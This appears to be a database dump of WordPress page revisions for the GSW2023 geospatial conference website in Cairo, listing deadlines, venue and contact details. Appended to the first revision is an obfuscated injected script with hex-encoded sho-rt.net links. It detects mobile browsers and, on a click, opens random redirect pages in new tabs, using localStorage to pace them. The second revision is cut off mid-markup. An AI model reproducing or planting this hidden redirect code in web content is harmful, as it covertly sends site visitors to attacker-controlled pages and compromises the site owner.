(3968,1,'2023-03-30 05:20:28','2023-03-30 05:20:28','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Submission of Abstracts and Full Paper is Now Open</h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong></p>\n<p>&nbsp;[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-03-30 05:20:28','2023-03-30 05:20:28','',3066,'https://gsw2023.com/?p=3968',0,'revision','',0),
(3969,1,'2023-03-30 05:29:12','2023-03-30 05:29:12','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Submission of Abstracts and Full Paper is Now Open</h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" 